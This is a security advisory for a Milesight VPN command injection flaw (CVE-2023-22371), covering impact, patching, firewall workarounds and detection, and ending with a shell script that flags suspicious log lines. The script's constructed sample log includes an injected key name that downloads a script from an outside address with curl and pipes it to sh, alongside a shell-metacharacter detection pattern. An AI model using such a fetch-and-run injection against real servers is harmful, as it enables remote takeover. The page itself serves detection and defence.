CVE-2023-22371
📋 TL;DR
This CVE describes an OS command injection vulnerability in the create_private_key functionality of Milesight VPN's liburvpn.so library. A specially crafted network packet causes the library to build and run a command that includes attacker-controlled input, so a remote attacker can execute arbitrary commands on the VPN server. Organizations running vulnerable versions of Milesight VPN are affected.
💻 Affected Systems
- Milesight VPN
📦 What is this software?
Milesight VPN by Milesight
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise with root/administrator privileges, allowing attackers to install malware, exfiltrate data, pivot to internal networks, or establish persistent backdoors.
Likely Case
Remote code execution leading to VPN server compromise, credential theft, network reconnaissance, and potential lateral movement within the network.
If Mitigated
Limited impact if network segmentation, strict firewall rules, and least privilege principles are implemented, potentially containing the attack to the VPN server.
🎯 Exploit Status
The vulnerability is triggered by sending malicious network packets and, as described, does not require authentication. Exploitation complexity is low, as is typical for command injection: once the injection point is known, the payload is an ordinary shell command. The injected command runs with the privileges of the VPN service process, so the impact depends on the account that process uses.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check vendor for updated version
Vendor Advisory: https://www.milesight.com/security/
Restart Required: Yes
Instructions:
1. Check the Milesight security advisory for patch availability.
2. Download and install the patched version from official vendor sources.
3. Restart the VPN service or system.
4. Verify the fix using the verification steps below.
🔧 Temporary Workarounds
Network Segmentation and Firewall Rules
Linux: Restrict network access to the Milesight VPN service to trusted IP addresses and networks only. Note that -A appends to the end of the INPUT chain, so these rules take effect only if no earlier rule already accepts the traffic; adjust -p if the service listens on UDP rather than TCP.
iptables -A INPUT -p tcp --dport [VPN_PORT] -s [TRUSTED_IP] -j ACCEPT
iptables -A INPUT -p tcp --dport [VPN_PORT] -j DROP
Disable Vulnerable Functionality
All platforms: If the product allows it, disable or restrict access to the interface that exposes the create_private_key functionality until the patch can be applied.
🧯 If You Can't Patch
- Implement strict network segmentation to isolate the VPN server from critical systems
- Deploy intrusion detection/prevention systems to monitor for exploit attempts and block malicious traffic
🔍 How to Verify
Check if Vulnerable:
Milesight VPN 2.0.2 is the version reported as vulnerable; confirm your installed version against the vendor advisory. Also review system logs for unusual command execution or unexpected network traffic to the VPN service.
Check Version:
Check the Milesight VPN administration interface or configuration files for version information. On a Linux host this may be a file such as /etc/milesight/vpn/version.conf (the exact path depends on the installation; the administration interface is the authoritative source).
Verify Fix Applied:
Verify that the installed version is later than 2.0.2 and matches the fixed version named in the vendor advisory. In a test environment, exercise the create_private_key functionality with a key name containing a harmless shell sequence (for example a name ending in ; echo test) and confirm that no second command runs and the input is rejected or treated literally.
📡 Detection & Monitoring
Log Indicators:
- Unusual command execution in system logs
- Failed authentication attempts followed by command injection patterns
- Unexpected process creation from VPN service
Network Indicators:
- Malformed packets sent to VPN service port
- Unusual outbound connections from VPN server
- Command injection patterns in network traffic
SIEM Query:
source="vpn_logs" AND (command_injection OR ("create_private_key" AND suspicious_pattern))
This is a pseudo-query: command_injection and suspicious_pattern are placeholders for your platform's detection rule or pattern match (shell metacharacters such as ; | & ` $ ( ) and their URL-encoded forms), and the grouping is explicit so that the function-name match is only flagged together with a suspicious pattern.
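As an added example, not part of the advisory, here is the "command injection patterns" check run over constructed log lines. The log layout (api=, src=, name= fields) is invented for illustration, since the page does not document the real Milesight VPN log format; adapt the field names, but keep the two-stage match: first the function name, then shell metacharacters including their URL-encoded forms, which a plain search for ; or | misses.

```shell
#!/bin/sh
# Added example, not from the advisory. Flags log lines that reference
# create_private_key together with shell metacharacters. The log format below
# is constructed; the real product's log layout is not described on the page.

# Metacharacters that turn a key name into a second command, plus the
# URL-encoded forms an HTTP-carried parameter might arrive in (the encoding
# assumption is ours; the page does not say how the parameter is transported).
META_RE='[;|&`$()]|%3[bB]|%7[cC]|%26|%60|%24|%28|%29|%0[aA]'

# Reads log lines on stdin, prints the suspicious ones.
# Exit status 0 if at least one line was flagged, 1 otherwise (grep semantics).
flag_injection_lines() {
    grep -E 'create_private_key' | grep -E "$META_RE"
}

# Count flagged lines in a log file.
count_injection_lines() {
    flag_injection_lines < "$1" | wc -l | tr -d ' '
}

# Constructed sample: two attack attempts from 203.0.113.9, one of them
# URL-encoded, among ordinary administrative calls.
SAMPLE_LOG='2024-05-01T10:00:01Z vpn api=create_private_key src=10.0.0.5 name=branch01
2024-05-01T10:00:07Z vpn api=create_private_key src=203.0.113.9 name=x;curl%20http://203.0.113.9/s|sh
2024-05-01T10:00:09Z vpn api=create_private_key src=203.0.113.9 name=x%3Bid
2024-05-01T10:00:12Z vpn api=list_keys src=10.0.0.5
2024-05-01T10:00:15Z vpn api=create_private_key src=10.0.0.6 name=site-b.prod'

# Demo: prints the two suspicious lines.
printf '%s\n' "$SAMPLE_LOG" | flag_injection_lines
```

A hit is a lead, not a verdict: pair it with the process-creation indicator above (the VPN service spawning sh, curl or similar) and with outbound connections from the VPN host to the same source address before declaring an incident.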